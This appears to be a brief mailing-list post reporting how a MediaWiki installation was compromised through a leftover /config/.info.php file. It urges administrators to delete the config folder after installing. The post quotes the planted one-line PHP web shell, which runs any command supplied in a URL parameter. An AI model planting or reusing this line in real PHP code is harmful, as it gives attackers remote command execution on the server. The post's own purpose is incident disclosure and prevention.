We managed to find and hopefully resolve this security hole.
It was not the index.php.
It was the /config/.info.php In that file there is the following line:
<?php system($_GET["id"]) ?>
We didn’t delete the config folder so someone was able to use that script to
get it.
The Mediawiki installation process does tell you to delete the config
folder. Maybe it should be in red J
I hope this will help everyone remember to remove the config folder after
installing the wiki.
Thanks,
Itay